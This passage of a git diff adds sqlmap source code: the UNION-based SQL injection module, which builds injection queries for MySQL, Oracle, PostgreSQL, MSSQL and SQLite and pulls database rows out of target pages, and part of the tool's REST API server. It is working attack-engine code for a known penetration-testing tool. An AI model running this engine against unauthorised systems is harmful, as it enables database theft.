+ conf.code = popValue() + conf.string = popValue() + kb.negativeLogic = popValue() + + if validPayload: + validPayload = agent.removePayloadDelimiters(validPayload) + + return validPayload, vector diff --git a/src/sqlmap-master/lib/techniques/union/use.py b/src/sqlmap-master/lib/techniques/union/use.py new file mode 100644 index 0000000..0a75356 --- /dev/null +++ b/src/sqlmap-master/lib/techniques/union/use.py @@ -0,0 +1,451 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import json +import re +import time + +from lib.core.agent import agent +from lib.core.bigarray import BigArray +from lib.core.common import arrayizeValue +from lib.core.common import Backend +from lib.core.common import calculateDeltaSeconds +from lib.core.common import clearConsoleLine +from lib.core.common import dataToStdout +from lib.core.common import extractRegexResult +from lib.core.common import firstNotNone +from lib.core.common import flattenValue +from lib.core.common import getConsoleWidth +from lib.core.common import getPartRun +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite +from lib.core.common import incrementCounter +from lib.core.common import initTechnique +from lib.core.common import isDigit +from lib.core.common import isListLike +from lib.core.common import isNoneValue +from lib.core.common import isNumPosStrValue +from lib.core.common import listToStrValue +from lib.core.common import parseUnionPage +from lib.core.common import removeReflectiveValues +from lib.core.common import singleTimeDebugMessage +from lib.core.common import singleTimeWarnMessage +from lib.core.common import unArrayizeValue +from lib.core.common import wasLastResponseDBMSError +from lib.core.compat import xrange +from lib.core.convert import getUnicode +from lib.core.convert import htmlUnescape +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import queries +from lib.core.dicts import FROM_DUMMY_TABLE +from lib.core.enums import DBMS +from lib.core.enums import HTTP_HEADER +from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapDataException +from lib.core.exception import SqlmapSyntaxException +from lib.core.settings import MAX_BUFFERED_PARTIAL_UNION_LENGTH +from lib.core.settings import NULL +from lib.core.settings import SQL_SCALAR_REGEX +from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT +from lib.core.threads import getCurrentThreadData +from lib.core.threads import runThreads +from lib.core.unescaper import unescaper +from lib.request.connect import Connect as Request +from lib.utils.progress import ProgressBar +from lib.utils.safe2bin import safecharencode +from thirdparty import six +from thirdparty.odict import OrderedDict + +def _oneShotUnionUse(expression, unpack=True, limited=False): + retVal = hashDBRetrieve("%s%s" % (conf.hexConvert or False, expression), checkConf=True) # as UNION data is stored raw unconverted + + threadData = getCurrentThreadData() + threadData.resumed = retVal is not None + + if retVal is None: + vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector + + if not kb.jsonAggMode: + injExpression = unescaper.escape(agent.concatQuery(expression, unpack)) + kb.unionDuplicates = vector[7] + kb.forcePartialUnion = vector[8] + + # Note: introduced columns in 1.4.2.42#dev + try: + kb.tableFrom = vector[9] + kb.unionTemplate = vector[10] + except IndexError: + pass + + query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) + where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6] + else: + injExpression = unescaper.escape(expression) + where = vector[6] + query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False) + + payload = agent.payload(newValue=query, where=where) + + # Perform the request + page, headers, _ = Request.queryPage(payload, content=True, raise404=False) + + if page and kb.chars.start.upper() in page and kb.chars.start not in page: + singleTimeWarnMessage("results seems to be upper-cased by force. sqlmap will automatically lower-case them") + + page = page.lower() + + incrementCounter(PAYLOAD.TECHNIQUE.UNION) + + if kb.jsonAggMode: + for _page in (page or "", (page or "").replace('\\"', '"')): + if Backend.isDbms(DBMS.MSSQL): + output = extractRegexResult(r"%s(?P<result>.*)%s" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload)) + if output: + try: + retVal = "" + fields = re.findall(r'"([^"]+)":', extractRegexResult(r"{(?P<result>[^}]+)}", output)) + for row in json.loads(output): + retVal += "%s%s%s" % (kb.chars.start, kb.chars.delimiter.join(getUnicode(row[field] or NULL) for field in fields), kb.chars.stop) + except: + retVal = None + else: + retVal = getUnicode(retVal) + elif Backend.isDbms(DBMS.PGSQL): + output = extractRegexResult(r"(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload)) + if output: + retVal = output + else: + output = extractRegexResult(r"%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload)) + if output: + try: + retVal = "" + for row in json.loads(output): + retVal += "%s%s%s" % (kb.chars.start, row, kb.chars.stop) + except: + retVal = None + else: + retVal = getUnicode(retVal) + + if retVal: + break + else: + # Parse the returned page to get the exact UNION-based + # SQL injection output + def _(regex): + return firstNotNone( + extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), + extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE) + ) + + # Automatically patching last char trimming cases + if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): + warnMsg = "automatically patching output having last char trimmed" + singleTimeWarnMessage(warnMsg) + page = page.replace(kb.chars.stop[:-1], kb.chars.stop) + + retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop)) + + if retVal is not None: + retVal = getUnicode(retVal, kb.pageEncoding) + + # Special case when DBMS is Microsoft SQL Server and error message is used as a result of UNION injection + if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError(): + retVal = htmlUnescape(retVal).replace("<br>", "\n") + + hashDBWrite("%s%s" % (conf.hexConvert or False, expression), retVal) + + elif not kb.jsonAggMode: + trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start)) + + if trimmed: + warnMsg = "possible server trimmed output detected " + warnMsg += "(probably due to its length and/or content): " + warnMsg += safecharencode(trimmed) + logger.warning(warnMsg) + + elif re.search(r"ORDER BY [^ ]+\Z", expression): + debugMsg = "retrying failed SQL query without the ORDER BY clause" + singleTimeDebugMessage(debugMsg) + + expression = re.sub(r"\s*ORDER BY [^ ]+\Z", "", expression) + retVal = _oneShotUnionUse(expression, unpack, limited) + + elif kb.nchar and re.search(r" AS N(CHAR|VARCHAR)", agent.nullAndCastField(expression)): + debugMsg = "turning off NATIONAL CHARACTER casting" # NOTE: in some cases there are "known" incompatibilities between original columns and NCHAR (e.g. http://testphp.vulnweb.com/artists.php?artist=1) + singleTimeDebugMessage(debugMsg) + + kb.nchar = False + retVal = _oneShotUnionUse(expression, unpack, limited) + else: + vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector + kb.unionDuplicates = vector[7] + + return retVal + +def configUnion(char=None, columns=None): + def _configUnionChar(char): + if not isinstance(char, six.string_types): + return + + kb.uChar = char + + if conf.uChar is not None: + kb.uChar = char.replace("[CHAR]", conf.uChar if isDigit(conf.uChar) else "'%s'" % conf.uChar.strip("'")) + + def _configUnionCols(columns): + if not isinstance(columns, six.string_types): + return + + columns = columns.replace(' ', "") + if '-' in columns: + colsStart, colsStop = columns.split('-') + else: + colsStart, colsStop = columns, columns + + if not isDigit(colsStart) or not isDigit(colsStop): + raise SqlmapSyntaxException("--union-cols must be a range of integers") + + conf.uColsStart, conf.uColsStop = int(colsStart), int(colsStop) + + if conf.uColsStart > conf.uColsStop: + errMsg = "--union-cols range has to represent lower to " + errMsg += "higher number of columns" + raise SqlmapSyntaxException(errMsg) + + _configUnionChar(char) + _configUnionCols(conf.uCols or columns) + +def unionUse(expression, unpack=True, dump=False): + """ + This function tests for an UNION SQL injection on the target + URL then call its subsidiary function to effectively perform an + UNION SQL injection on the affected URL + """ + + initTechnique(PAYLOAD.TECHNIQUE.UNION) + + abortedFlag = False + count = None + origExpr = expression + startLimit = 0 + stopLimit = None + value = None + + width = getConsoleWidth() + start = time.time() + + _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) + + # Set kb.partRun in case the engine is called from the API + kb.partRun = getPartRun(alias=False) if conf.api else None + + if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): + # Removed ORDER BY clause because UNION does not play well with it + expression = re.sub(r"(?i)\s*ORDER BY\s+[\w,]+", "", expression) + debugMsg = "stripping ORDER BY clause from statement because " + debugMsg += "it does not play well with UNION query SQL injection" + singleTimeDebugMessage(debugMsg) + + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL, DBMS.SQLITE) and expressionFields and not any((conf.binaryFields, conf.limitStart, conf.limitStop, conf.forcePartial, conf.disableJson)): + match = re.search(r"SELECT\s*(.+?)\bFROM", expression, re.I) + if match and not (Backend.isDbms(DBMS.ORACLE) and FROM_DUMMY_TABLE[DBMS.ORACLE] in expression) and not re.search(r"\b(MIN|MAX|COUNT)\(", expression): + kb.jsonAggMode = True + if Backend.isDbms(DBMS.MYSQL): + query = expression.replace(expressionFields, "CONCAT('%s',JSON_ARRAYAGG(CONCAT_WS('%s',%s)),'%s')" % (kb.chars.start, kb.chars.delimiter, expressionFields, kb.chars.stop), 1) + elif Backend.isDbms(DBMS.ORACLE): + query = expression.replace(expressionFields, "'%s'||JSON_ARRAYAGG(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(expressionFieldsList), kb.chars.stop), 1) + elif Backend.isDbms(DBMS.SQLITE): + query = expression.replace(expressionFields, "'%s'||JSON_GROUP_ARRAY(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1) + elif Backend.isDbms(DBMS.PGSQL): # Note: ARRAY_AGG does CSV alike output, thus enclosing start/end inside each item + query = expression.replace(expressionFields, "ARRAY_AGG('%s'||%s||'%s')::text" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s::text,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1) + elif Backend.isDbms(DBMS.MSSQL): + query = "'%s'+(%s FOR JSON AUTO, INCLUDE_NULL_VALUES)+'%s'" % (kb.chars.start, expression, kb.chars.stop) + output = _oneShotUnionUse(query, False) + value = parseUnionPage(output) + kb.jsonAggMode = False + + # We have to check if the SQL query might return multiple entries + # if the technique is partial UNION query and in such case forge the + # SQL limiting the query output one entry at a time + # NOTE: we assume that only queries that get data from a table can + # return multiple entries + if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or conf.forcePartial or (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): + expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) + + if limitCond: + # Count the number of SQL query entries output + countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) + + if " ORDER BY " in countedExpression.upper(): + _ = countedExpression.upper().rindex(" ORDER BY ") + countedExpression = countedExpression[:_] + + output = _oneShotUnionUse(countedExpression, unpack) + count = unArrayizeValue(parseUnionPage(output)) + + if isNumPosStrValue(count): + if isinstance(stopLimit, int) and stopLimit > 0: + stopLimit = min(int(count), int(stopLimit)) + else: + stopLimit = int(count) + + debugMsg = "used SQL query returns " + debugMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry") + logger.debug(debugMsg) + + elif count and (not isinstance(count, six.string_types) or not count.isdigit()): + warnMsg = "it was not possible to count the number " + warnMsg += "of entries for the SQL query provided. " + warnMsg += "sqlmap will assume that it returns only " + warnMsg += "one entry" + logger.warning(warnMsg) + + stopLimit = 1 + + elif not isNumPosStrValue(count): + if not count: + warnMsg = "the SQL query provided does not " + warnMsg += "return any output" + logger.warning(warnMsg) + else: + value = [] # for empty tables + return value + + if isNumPosStrValue(count) and int(count) > 1: + threadData = getCurrentThreadData() + + try: + threadData.shared.limits = iter(xrange(startLimit, stopLimit)) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) + + numThreads = min(conf.threads, (stopLimit - startLimit)) + threadData.shared.value = BigArray() + threadData.shared.buffered = [] + threadData.shared.counter = 0 + threadData.shared.lastFlushed = startLimit - 1 + threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 + + if threadData.shared.showEta: + threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) + + if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: + kb.suppressResumeInfo = True + debugMsg = "suppressing possible resume console info for " + debugMsg += "large number of rows as it might take too long" + logger.debug(debugMsg) + + try: + def unionThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + with kb.locks.limit: + try: + threadData.shared.counter += 1 + num = next(threadData.shared.limits) + except StopIteration: + break + + if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): + field = expressionFieldsList[0] + elif Backend.isDbms(DBMS.ORACLE): + field = expressionFieldsList + else: + field = None + + limitedExpr = agent.limitQuery(num, expression, field) + output = _oneShotUnionUse(limitedExpr, unpack, True) + + if not kb.threadContinue: + break + + if output: + with kb.locks.value: + if all(_ in output for _ in (kb.chars.start, kb.chars.stop)): + items = parseUnionPage(output) + + if threadData.shared.showEta: + threadData.shared.progress.progress(threadData.shared.counter) + if isListLike(items): + # in case that we requested N columns and we get M!=N then we have to filter a bit + if len(items) > 1 and len(expressionFieldsList) > 1: + items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] + items = [_ for _ in flattenValue(items)] + if len(items) > len(expressionFieldsList): + filtered = OrderedDict() + for item in items: + key = re.sub(r"[^A-Za-z0-9]", "", item).lower() + if key not in filtered or re.search(r"[^A-Za-z0-9]", item): + filtered[key] = item + items = list(six.itervalues(filtered)) + items = [items] + index = None + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, items)) + else: + index = None + if threadData.shared.showEta: + threadData.shared.progress.progress(threadData.shared.counter) + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, None)) + + items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) + + while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): + threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] + if not isNoneValue(_): + threadData.shared.value.extend(arrayizeValue(_)) + del threadData.shared.buffered[0] + + if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta and not kb.bruteMode: + _ = ','.join("'%s'" % _ for _ in (flattenValue(arrayizeValue(items)) if not isinstance(items, six.string_types) else [items])) + status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_)) + + if len(status) > width: + status = "%s..." % status[:width - 3] + + dataToStdout("%s\n" % status) + + runThreads(numThreads, unionThread) + + if conf.verbose == 1: + clearConsoleLine(True) + + except KeyboardInterrupt: + abortedFlag = True + + warnMsg = "user aborted during enumeration. sqlmap " + warnMsg += "will display partial output" + logger.warning(warnMsg) + + finally: + for _ in sorted(threadData.shared.buffered): + if not isNoneValue(_[1]): + threadData.shared.value.extend(arrayizeValue(_[1])) + value = threadData.shared.value + kb.suppressResumeInfo = False + + if not value and not abortedFlag: + output = _oneShotUnionUse(expression, unpack) + value = parseUnionPage(output) + + duration = calculateDeltaSeconds(start) + + if not kb.bruteMode: + debugMsg = "performed %d quer%s in %.2f seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], 'y' if kb.counters[PAYLOAD.TECHNIQUE.UNION] == 1 else "ies", duration) + logger.debug(debugMsg) + + return value diff --git a/src/sqlmap-master/lib/utils/__init__.py b/src/sqlmap-master/lib/utils/__init__.py new file mode 100644 index 0000000..7777bde --- /dev/null +++ b/src/sqlmap-master/lib/utils/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/src/sqlmap-master/lib/utils/api.py b/src/sqlmap-master/lib/utils/api.py new file mode 100644 index 0000000..b3d4f38 --- /dev/null +++ b/src/sqlmap-master/lib/utils/api.py @@ -0,0 +1,918 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +import contextlib +import logging +import os +import re +import shlex +import socket +import sqlite3 +import sys +import tempfile +import threading +import time + +from lib.core.common import dataToStdout +from lib.core.common import getSafeExString +from lib.core.common import openFile +from lib.core.common import saveConfig +from lib.core.common import setColor +from lib.core.common import unArrayizeValue +from lib.core.compat import xrange +from lib.core.convert import decodeBase64 +from lib.core.convert import dejsonize +from lib.core.convert import encodeBase64 +from lib.core.convert import encodeHex +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.convert import jsonize +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import paths +from lib.core.datatype import AttribDict +from lib.core.defaults import _defaults +from lib.core.dicts import PART_RUN_CONTENT_TYPES +from lib.core.enums import AUTOCOMPLETE_TYPE +from lib.core.enums import CONTENT_STATUS +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.exception import SqlmapConnectionException +from lib.core.log import LOGGER_HANDLER +from lib.core.optiondict import optDict +from lib.core.settings import IS_WIN +from lib.core.settings import RESTAPI_DEFAULT_ADAPTER +from lib.core.settings import RESTAPI_DEFAULT_ADDRESS +from lib.core.settings import RESTAPI_DEFAULT_PORT +from lib.core.settings import RESTAPI_UNSUPPORTED_OPTIONS +from lib.core.settings import VERSION_STRING +from lib.core.shell import autoCompletion +from lib.core.subprocessng import Popen +from lib.parse.cmdline import cmdLineParser +from thirdparty.bottle.bottle import error as return_error +from thirdparty.bottle.bottle import get +from thirdparty.bottle.bottle import hook +from thirdparty.bottle.bottle import post +from thirdparty.bottle.bottle import request +from thirdparty.bottle.bottle import response +from thirdparty.bottle.bottle import run +from thirdparty.bottle.bottle import server_names +from thirdparty import six +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import input as _input +from thirdparty.six.moves import urllib as _urllib + +# Global data storage +class DataStore(object): + admin_token = "" + current_db = None + tasks = dict() + username = None + password = None + +# API objects +class Database(object): + filepath = None + + def __init__(self, database=None): + self.database = self.filepath if database is None else database + self.connection = None + self.cursor = None + + def connect(self, who="server"): + self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None, check_same_thread=False) + self.cursor = self.connection.cursor() + self.lock = threading.Lock() + logger.debug("REST-JSON API %s connected to IPC database" % who) + + def disconnect(self): + if self.cursor: + self.cursor.close() + + if self.connection: + self.connection.close() + + def commit(self): + self.connection.commit() + + def execute(self, statement, arguments=None): + with self.lock: + while True: + try: + if arguments: + self.cursor.execute(statement, arguments) + else: + self.cursor.execute(statement) + except sqlite3.OperationalError as ex: + if "locked" not in getSafeExString(ex): + raise + else: + time.sleep(1) + else: + break + + if statement.lstrip().upper().startswith("SELECT"): + return self.cursor.fetchall() + + def init(self): + self.execute("CREATE TABLE IF NOT EXISTS logs(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, time TEXT, level TEXT, message TEXT)") + self.execute("CREATE TABLE IF NOT EXISTS data(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, status INTEGER, content_type INTEGER, value TEXT)") + self.execute("CREATE TABLE IF NOT EXISTS errors(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, error TEXT)") + +class Task(object): + def __init__(self, taskid, remote_addr): + self.remote_addr = remote_addr + self.process = None + self.output_directory = None + self.options = None + self._original_options = None + self.initialize_options(taskid) + + def initialize_options(self, taskid): + datatype = {"boolean": False, "string": None, "integer": None, "float": None} + self.options = AttribDict() + + for _ in optDict: + for name, type_ in optDict[_].items(): + type_ = unArrayizeValue(type_) + self.options[name] = _defaults.get(name, datatype[type_]) + + # Let sqlmap engine knows it is getting called by the API, + # the task ID and the file path of the IPC database + self.options.api = True + self.options.taskid = taskid + self.options.database = Database.filepath + + # Enforce batch mode and disable coloring and ETA + self.options.batch = True + self.options.disableColoring = True + self.options.eta = False + + self._original_options = AttribDict(self.options) + + def set_option(self, option, value): + self.options[option] = value + + def get_option(self, option): + return self.options[option] + + def get_options(self): + return self.options + + def reset_options(self): + self.options = AttribDict(self._original_options) + + def engine_start(self): + handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True) + os.close(handle) + saveConfig(self.options, configFile) + + if os.path.exists("sqlmap.py"): + self.process = Popen([sys.executable or "python", "sqlmap.py", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN) + elif os.path.exists(os.path.join(os.getcwd(), "sqlmap.py")): + self.process = Popen([sys.executable or "python", "sqlmap.py", "--api", "-c", configFile], shell=False, cwd=os.getcwd(), close_fds=not IS_WIN) + elif os.path.exists(os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), "sqlmap.py")): + self.process = Popen([sys.executable or "python", "sqlmap.py", "--api", "-c", configFile], shell=False, cwd=os.path.join(os.path.abspath(os.path.dirname(sys.argv[0]))), close_fds=not IS_WIN) + else: + self.process = Popen(["sqlmap", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN) + + def engine_stop(self): + if self.process: + self.process.terminate() + return self.process.wait() + else: + return None + + def engine_process(self): + return self.process + + def engine_kill(self): + if self.process: + try: + self.process.kill() + return self.process.wait() + except: + pass + return None + + def engine_get_id(self): + if self.process: + return self.process.pid + else: + return None + + def engine_get_returncode(self): + if self.process: + self.process.poll() + return self.process.returncode + else: + return None + + def engine_has_terminated(self): + return isinstance(self.engine_get_returncode(), int) + +# Wrapper functions for sqlmap engine +class StdDbOut(object): + def __init__(self, taskid, messagetype="stdout"): + # Overwrite system standard output and standard error to write + # to an IPC database + self.messagetype = messagetype + self.taskid = taskid + + if self.messagetype == "stdout": + sys.stdout = self + else: + sys.stderr = self + + def write(self, value, status=CONTENT_STATUS.IN_PROGRESS, content_type=None): + if self.messagetype == "stdout": + if content_type is None: + if kb.partRun is not None: + content_type = PART_RUN_CONTENT_TYPES.get(kb.partRun) + else: + # Ignore all non-relevant messages + return + + output = conf.databaseCursor.execute("SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", (self.taskid, content_type)) + + # Delete partial output from IPC database if we have got a complete output + if status == CONTENT_STATUS.COMPLETE: + if len(output) > 0: + for index in xrange(len(output)): + conf.databaseCursor.execute("DELETE FROM data WHERE id = ?", (output[index][0],)) + + conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) + if kb.partRun: + kb.partRun = None + + elif status == CONTENT_STATUS.IN_PROGRESS: + if len(output) == 0: + conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) + else: + new_value = "%s%s" % (dejsonize(output[0][2]), value) + conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?", (jsonize(new_value), output[0][0])) + else: + conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", (self.taskid, str(value) if value else "")) + + def flush(self): + pass + + def close(self): + pass + + def seek(self): + pass + +class LogRecorder(logging.StreamHandler): + def emit(self, record): + """ + Record emitted events to IPC database for asynchronous I/O + communication with the parent process + """ + conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", (conf.taskid, time.strftime("%X"), record.levelname, str(record.msg % record.args if record.args else record.msg))) + +def setRestAPILog(): + if conf.api: + try: + conf.databaseCursor = Database(conf.database) + conf.databaseCursor.connect("client") + except sqlite3.OperationalError as ex: + raise SqlmapConnectionException("%s ('%s')" % (ex, conf.database)) + + # Set a logging handler that writes log messages to a IPC database + logger.removeHandler(LOGGER_HANDLER) + LOGGER_RECORDER = LogRecorder() + logger.addHandler(LOGGER_RECORDER) + +# Generic functions +def is_admin(token): + return DataStore.admin_token == token + +@hook('before_request') +def check_authentication(): + if not any((DataStore.username, DataStore.password)): + return + + authorization = request.headers.get("Authorization", "") + match = re.search(r"(?i)\ABasic\s+([^\s]+)", authorization) + + if not match: + request.environ["PATH_INFO"] = "/error/401" + + try: + creds = decodeBase64(match.group(1), binary=False) + except: + request.environ["PATH_INFO"] = "/error/401" + else: + if creds.count(':') != 1: + request.environ["PATH_INFO"] = "/error/401" + else: + username, password = creds.split(':') + if username.strip() != (DataStore.username or "") or password.strip() != (DataStore.password or ""): + request.environ["PATH_INFO"] = "/error/401" + +@hook("after_request") +def security_headers(json_header=True): + """ + Set some headers across all HTTP responses + """ + response.headers["Server"] = "Server" + response.headers["X-Content-Type-Options"] = "nosniff" + response.headers["X-Frame-Options"] = "DENY" + response.headers["X-XSS-Protection"] = "1; mode=block" + response.headers["Pragma"] = "no-cache" + response.headers["Cache-Control"] = "no-cache" + response.headers["Expires"] = "0" + + if json_header: + response.content_type = "application/json; charset=UTF-8" + +############################## +# HTTP Status Code functions # +############################## + +@return_error(401) # Access Denied +def error401(error=None): + security_headers(False) + return "Access denied" + +@return_error(404) # Not Found +def error404(error=None): + security_headers(False) + return "Nothing here" + +@return_error(405) # Method Not Allowed (e.g. when requesting a POST method via GET) +def error405(error=None): + security_headers(False) + return "Method not allowed" + +@return_error(500) # Internal Server Error +def error500(error=None): + security_headers(False) + return "Internal server error" + +############# +# Auxiliary # +############# + +@get('/error/401') +def path_401(): + response.status = 401 + return response + +############################# +# Task management functions # +############################# + +# Users' methods +@get("/task/new") +def task_new(): + """ + Create a new task + """ + taskid = encodeHex(os.urandom(8), binary=False) + remote_addr = request.remote_addr + + DataStore.tasks[taskid] = Task(taskid, remote_addr) + + logger.debug("Created new task: '%s'" % taskid) + return jsonize({"success": True, "taskid": taskid}) + +@get("/task/<taskid>/delete") +def task_delete(taskid): + """ + Delete an existing task + """ + if taskid in DataStore.tasks: + DataStore.tasks.pop(taskid) + + logger.debug("(%s) Deleted task" % taskid) + return jsonize({"success": True}) + else: + response.status = 404 + logger.warning("[%s] Non-existing task ID provided to task_delete()" % taskid) + return jsonize({"success": False, "message": "Non-existing task ID"}) + +################### +# Admin functions # +################### + +@get("/admin/list") +@get("/admin/<token>/list") +def task_list(token=None): + """ + Pull task list + """ + tasks = {} + + for key in DataStore.tasks: + if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr: + tasks[key] = dejsonize(scan_status(key))["status"] + + logger.debug("(%s) Listed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) + return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) + +@get("/admin/flush") +@get("/admin/<token>/flush") +def task_flush(token=None): + """ + Flush task spool (delete all tasks) + """ + + for key in list(DataStore.tasks): + if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr: + DataStore.tasks[key].engine_kill() + del DataStore.tasks[key] + + logger.debug("(%s) Flushed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) + return jsonize({"success": True}) + +################################## +# sqlmap core interact functions # +################################## + +# Handle task's options +@get("/option/<taskid>/list") +def option_list(taskid): + """ + List options for a certain task ID + """ + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to option_list()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) + + logger.debug("(%s) Listed task options" % taskid) + return jsonize({"success": True, "options": DataStore.tasks[taskid].get_options()}) + +@post("/option/<taskid>/get") +def option_get(taskid): + """ + Get value of option(s) for a certain task ID + """ + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to option_get()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) + + options = request.json or [] + results = {} + + for option in options: + if option in DataStore.tasks[taskid].options: + results[option] = DataStore.tasks[taskid].options[option] + else: + logger.debug("(%s) Requested value for unknown option '%s'" % (taskid, option)) + return jsonize({"success": False, "message": "Unknown option '%s'" % option}) + + logger.debug("(%s) Retrieved values for option(s) '%s'" % (taskid, ','.join(options))) + + return jsonize({"success": True, "options": results}) + +@post("/option/<taskid>/set") +def option_set(taskid): + """ + Set value of option(s) for a certain task ID + """ + + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to option_set()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) + + if request.json is None: + logger.warning("[%s] Invalid JSON options provided to option_set()" % taskid) + return jsonize({"success": False, "message": "Invalid JSON options"}) + + for option, value in request.json.items(): + DataStore.tasks[taskid].set_option(option, value) + + logger.debug("(%s) Requested to set options" % taskid) + return jsonize({"success": True}) + +# Handle scans +@post("/scan/<taskid>/start") +def scan_start(taskid): + """ + Launch a scan + """ + + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_start()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) + + if request.json is None: + logger.warning("[%s] Invalid JSON options provided to scan_start()" 